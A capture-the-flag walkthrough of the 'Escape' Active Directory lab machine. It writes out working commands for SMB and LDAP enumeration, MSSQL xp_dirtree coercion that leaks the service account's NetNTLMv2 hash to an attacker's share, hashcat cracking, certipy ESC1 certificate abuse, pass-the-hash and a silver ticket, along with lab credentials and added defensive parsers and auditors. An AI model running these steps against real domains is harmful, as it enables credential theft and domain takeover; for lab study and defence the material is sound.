Escape
Overview
A Windows machine created by Geiseric features techniques including:
Active Directory
MSSQL Server UNC Path Injection
Credentials Harvest
Misconfigured Certificate Templates
Silver Ticket Attack
Reconnaissance
Services Discovery
The port scan result suggests that the target is a domain controller and that an MSSQL server is running on it. We may also be able to access the target remotely via WinRM later.
$ sudo nmap -n -p- -Pn -v -sS -T4 --min-rate 1000 10.129.140.112 -oN ports.nmap
...
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
...
RootDSE
We can use ldapsearch to get the domain name sequel.htb.
$ ldapsearch -H ldap://10.129.140.112 -b '' -s base -x
...
schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=sequel,DC=htb
namingContexts: CN=Configuration,DC=sequel,DC=htb
...
We can check the target's hostname dc.sequel.htb with dig.
$ dig @<target_ip> dc.sequel.htb
...
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;dc.sequel.htb. IN A
;; ANSWER SECTION:
dc.sequel.htb. 1200 IN A 10.129.140.112
SMB
It seems that SMB null session authentication is enabled on the target.
$ smbclient -N -L \\\\10.129.140.112\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
We can further enumerate the share Public using smbclient and find a PDF file SQL Server Procedures.pdf.
$ smbclient -N \\\\10.129.140.112\\Public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 11:51:25 2022
.. D 0 Sat Nov 19 11:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 13:39:43 2022
5184255 blocks of size 4096. 1446274 blocks available
SQL Server Procedures.pdf
We can learn a lot of information from the PDF file:
The domain name is sequel.htb.
The target company cloned the DC mockup to a dedicated mock SQL instance for the test.
Users can authenticate to the MSSQL server using Windows authentication on a domain-joined machine.
Users on a non-domain-joined machine need to use cmdkey before authenticating to MSSQL.
We can authenticate to the MSSQL server with the credential PublicUser:GuestUserCantWrite1 using SQL Server Authentication.
Some user names and emails appear, including Ryan, Tom, Brandon, and brandon.brown@sequel.htb.
MSSQL
We can use Impacket's mssqlclient, which uses SQL Server authentication by default, to log in to the MSSQL server now.
$ impacket-mssqlclient PublicUser:GuestUserCantWrite1@escape
The instance we are connecting to is DC\SQLMOCK.
SQL> select @@servername;
----------
DC\SQLMOCK
Initial Access
UNC Path Injection
We can use the stored procedure xp_dirtree to force the MSSQL server to authenticate to an SMB share we control; the service account's NetNTLMv2 response is captured by our SMB listener.
SQL> EXEC xp_dirtree "\\<IP>\share"
subdirectory depth
------------ -----
We can then crack the captured NetNTLMv2 response with hashcat in mode 5600 and obtain the credential SQL_SVC:REGGIE1234ronnie.
$ hashcat -m 5600 --force mssql/hash.txt <path_to_rockyou>
...
SQL_SVC::sequel:aaaaaaaaaaaaaaaa:ccaa3775661de1f13e604b4852ca1bb4:0101000000000000006614269f9ed901a11548007705bd96000000000100100062007a00430042004d00650050006f000300100062007a00430042004d00650050006f00020010006c0065005800420064006e0055005a00040010006c0065005800420064006e0055005a0007000800006614269f9ed90106000400020000000800300030000000000000000000000000300000ba7e14ae44c472a55ae9f2e3595120b049681885ea1cda180cb1ef3a3eef4d650a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320032000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SQL_SVC::sequel:aaaaaaaaaaaaaaaa:ccaa3775661de1f13e...000000
...
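From a defender's side, the captured response line is evidence in its own right: the client blob carries the time of the coerced authentication and the AV pairs, among them the target name the SQL service was made to authenticate to. This parser is an added example, not part of the original writeup; it decodes the hashcat mode 5600 line shown above following the NTLMv2_CLIENT_CHALLENGE layout from MS-NLMP, and the SAMPLE constant is that line copied from the output.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR identifiers from MS-NLMP section 2.2.2.1.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
STRING_AV_IDS = {1, 2, 3, 4, 5, 9}  # pairs whose value is a UTF-16LE string

# Captured response copied from the hashcat output above. The trailing
# ":REGGIE1234ronnie" is the cracked password hashcat appended; it is ignored.
SAMPLE = "SQL_SVC::sequel:aaaaaaaaaaaaaaaa:ccaa3775661de1f13e604b4852ca1bb4:0101000000000000006614269f9ed901a11548007705bd96000000000100100062007a00430042004d00650050006f000300100062007a00430042004d00650050006f00020010006c0065005800420064006e0055005a00040010006c0065005800420064006e0055005a0007000800006614269f9ed90106000400020000000800300030000000000000000000000000300000ba7e14ae44c472a55ae9f2e3595120b049681885ea1cda180cb1ef3a3eef4d650a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320032000000000000000000:REGGIE1234ronnie"

def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_netntlmv2(line):
    """Decode a hashcat mode 5600 line: USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB."""
    parts = line.strip().split(":")
    blob = bytes.fromhex(parts[5])
    # NTLMv2_CLIENT_CHALLENGE layout: RespType(1) HiRespType(1) Reserved(6)
    # TimeStamp(8) ChallengeFromClient(8) Reserved(4) AV_PAIRs ending with MsvAvEOL
    timestamp, = struct.unpack_from("<Q", blob, 8)
    av_pairs, offset = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        if av_id == 0:  # MsvAvEOL
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id in STRING_AV_IDS:
            av_pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            av_pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            av_pairs[name] = struct.unpack("<I", value)[0]
        else:
            av_pairs[name] = value.hex()  # SingleHost, ChannelBindings stay opaque
    return {"user": parts[0], "domain": parts[2], "server_challenge": parts[3],
            "ntproofstr": parts[4], "timestamp": filetime_to_datetime(timestamp),
            "client_challenge": blob[16:24].hex(), "av_pairs": av_pairs}

if __name__ == "__main__":
    info = parse_netntlmv2(SAMPLE)
    print(f"{info['domain']}\\{info['user']} authenticated at {info['timestamp']}")
    for name, value in info["av_pairs"].items():
        print(f"  {name}: {value}")
```

The TargetName pair tells an analyst which host the service account was coerced into authenticating to, and the blob timestamp pins the event down for correlation with SQL Server and SMB logs.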
WinRM
We can access the target using evil-winrm now.
$ evil-winrm -i <ip> -u sql_svc -p REGGIE1234ronnie
Discovery
LDAP Search
We can't use ldapsearch with a simple bind because the server requires LDAP signing.
$ ldapsearch -D sql_svc@sequel.htb -x -b 'dc=sequel,dc=htb' -H ldap://escape -w REGGIE1234ronnie
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
User Ryan.Cooper
We find an MSSQL log file C:\SQLServer\Logs\ERRORLOG.BAK.
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...
We see that the user Ryan.Cooper mistakenly typed his password into the user name field, so we can try to log in to the target with this password now.
$ evil-winrm -i escape -u ryan.cooper -p NuclearMosquito3
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
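A defender can hunt for exactly this pattern in ERRORLOG: a failed logon whose 'user' is a bare token, arriving from the same client moments after a failure for a real domain account. The detector below is an added example, not part of the writeup; SAMPLE_LOG is constructed to mirror the excerpt above, and the one-second pairing window is an assumption.

```python
import re
from datetime import datetime, timedelta

# One SQL Server ERRORLOG "Logon failed" record (error 18456), in the layout
# of the ERRORLOG.BAK excerpt above.
FAILED_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)
PAIR_WINDOW = timedelta(seconds=1)  # assumption: the retry follows within 1 s

def parse_failed_logons(lines):
    events = []
    for line in lines:
        m = FAILED_LOGON.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           "user": m["user"], "client": m["client"]})
    return events

def find_swapped_credentials(lines):
    """Heuristic: a failure for a domain account (DOMAIN\\user) followed from the
    same client by a failure whose 'user' is a bare token usually means the password
    went into the user name field. Only its length is reported, so the alert does
    not spread the secret further; the account's password must be rotated."""
    events = parse_failed_logons(lines)
    findings = []
    for prev, cur in zip(events, events[1:]):
        same_client = prev["client"] == cur["client"]
        close = timedelta(0) <= cur["ts"] - prev["ts"] <= PAIR_WINDOW
        prev_domain = "\\" in prev["user"]
        cur_bare = "\\" not in cur["user"] and "@" not in cur["user"]
        if same_client and close and prev_domain and cur_bare:
            findings.append({"account": prev["user"], "leaked_length": len(cur["user"]),
                             "client": cur["client"], "ts": cur["ts"]})
    return findings

# Constructed sample modelled on the excerpt above; the last line is an unrelated
# failure for a SQL login that must not be flagged.
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:01.10 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
""".splitlines()

if __name__ == "__main__":
    for f in find_swapped_credentials(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']}: likely password of {f['account']} logged "
              f"as a user name ({f['leaked_length']} chars) - rotate it")
```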
Group
We see that the user Ryan is a member of the group Certificate Service DCOM Access, whose members can connect to certification authorities in the enterprise.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
...
It seems that we may be able to abuse AD CS for domain escalation.
Privilege Escalation
Certified Pre-Owned
Offensive techniques including certificate theft, persistence, and escalation are outlined in the whitepaper Certified Pre-Owned: Abusing Active Directory Certificate Services.
See Certified Pre-Owned.
Technique ESC1
Users obtain certificates from the CA through the certificate enrollment process. Some misconfigurations of this process may allow domain escalation.
We can use the tool Certify.exe to enumerate misconfigured certificate templates, or the Python package certipy to enumerate them from Linux. We find a vulnerable certificate template named UserAuthentication:
$ python3 -m pip install certipy-ad
$ certipy find -u 'ryan.cooper@sequel' -p 'NuclearMosquito3' -dc-ip 'escape' -vulnerable -stdout
...
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    ...
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : 16777216
                                          65536
                                          ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
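The certipy verdict above reduces to a few template attributes that can be checked in any AD CS inventory. The audit routine below is an added example (neither certipy's code nor the writeup's): it encodes the ESC1 preconditions and runs them against the UserAuthentication template as shown above and against a hardened copy; the BROAD_GROUPS set is an assumption about which principals count as low privilege.

```python
# Template attributes transcribed from the certipy output above; only the
# fields ESC1 depends on are kept. Keys mirror certipy's field names.
USER_AUTHENTICATION = {
    "Template Name": "UserAuthentication",
    "Enabled": True,
    "Enrollee Supplies Subject": True,
    "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Enrollment Rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                          "SEQUEL.HTB\\Enterprise Admins"],
}
# Hardened copy: the CA builds the subject from AD instead of trusting the request.
HARDENED = {**USER_AUTHENTICATION, "Template Name": "UserAuthentication-hardened",
            "Enrollee Supplies Subject": False}

# Assumption: these well-known groups stand for "any low-privileged principal";
# a real audit would resolve nested group membership rather than match names.
BROAD_GROUPS = {"domain users", "domain computers", "authenticated users", "everyone"}
# EKUs accepted for client authentication; per Certified Pre-Owned a template
# with 'Any Purpose' or with no EKU at all qualifies too.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}

def esc1_findings(template):
    """Return the reasons a template meets every ESC1 precondition, or []
    when any one of them fails."""
    ekus = set(template.get("Extended Key Usage", []))
    broad = [p for p in template.get("Enrollment Rights", [])
             if p.split("\\", 1)[-1].lower() in BROAD_GROUPS]
    conditions = [
        (template.get("Enabled", False), "template is enabled"),
        (not ekus or bool(ekus & CLIENT_AUTH_EKUS), "template allows client authentication"),
        (template.get("Enrollee Supplies Subject", False), "enrollee supplies subject (arbitrary UPN in SAN)"),
        (not template.get("Requires Manager Approval", False), "no manager approval"),
        (template.get("Authorized Signatures Required", 0) == 0, "no authorized signatures required"),
        (bool(broad), f"{', '.join(broad)} can enroll"),
    ]
    return [reason for ok, reason in conditions] if all(ok for ok, _ in conditions) else []

def audit_templates(templates):
    """Map template name -> ESC1 reasons for every template that is vulnerable."""
    return {t["Template Name"]: r for t in templates if (r := esc1_findings(t))}

if __name__ == "__main__":
    for name, reasons in audit_templates([USER_AUTHENTICATION, HARDENED]).items():
        print(f"[!] ESC1 {name}: " + "; ".join(reasons))
```

Any one of the remediations the conditions encode (turning off Enrollee Supplies Subject, requiring manager approval, or removing the broad enrollment right) makes the check return empty.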
Certificate Signing Request
We can now use certipy to request a certificate for the user administrator.
$ certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Authentication
We can request a TGT for the user administrator using the certificate now.
$ sudo ntpdate -u escape
$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
And we can log in to the target using evil-winrm now.
$ evil-winrm -i escape -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Miscellaneous
Silver Ticket Attack
Since we have the password of the service account SQL_SVC, we can mint a service ticket for a non-existent SPN using its password hash, as in a silver ticket attack.
First, we need the domain SID, in our case S-1-5-21-4078382237-1492182817-2568127209:
$ evil-winrm -u sql_svc -i escape -p REGGIE1234ronnie
...
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
sequel\sql_svc S-1-5-21-4078382237-1492182817-2568127209-1106
...
We also need the NT hash 1443ec19da4dac4ffc953bca1b57b4cf, which is the MD4 digest of the UTF-16LE encoded password:
from Cryptodome.Hash import MD4  # from the pycryptodomex package
from binascii import hexlify

password = 'REGGIE1234ronnie'
# The NT hash is an unsalted MD4 over the UTF-16LE encoding of the password.
md4 = MD4.new()
md4.update(password.encode('utf_16le'))
print(hexlify(md4.digest()).decode().upper())  # 1443EC19DA4DAC4FFC953BCA1B57B4CF
We can mint the TGS for the user Administrator using Impacket's ticketer with a non-existent SPN, without touching the DC.
$ impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip escape -spn MSSQL/DC.SEQUEL.HTB Administrator
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
We can now log in to the MSSQL service as the account administrator.
$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -k dc.sequel.htb
...
SQL> select suser_name()
--------------------
sequel\Administrator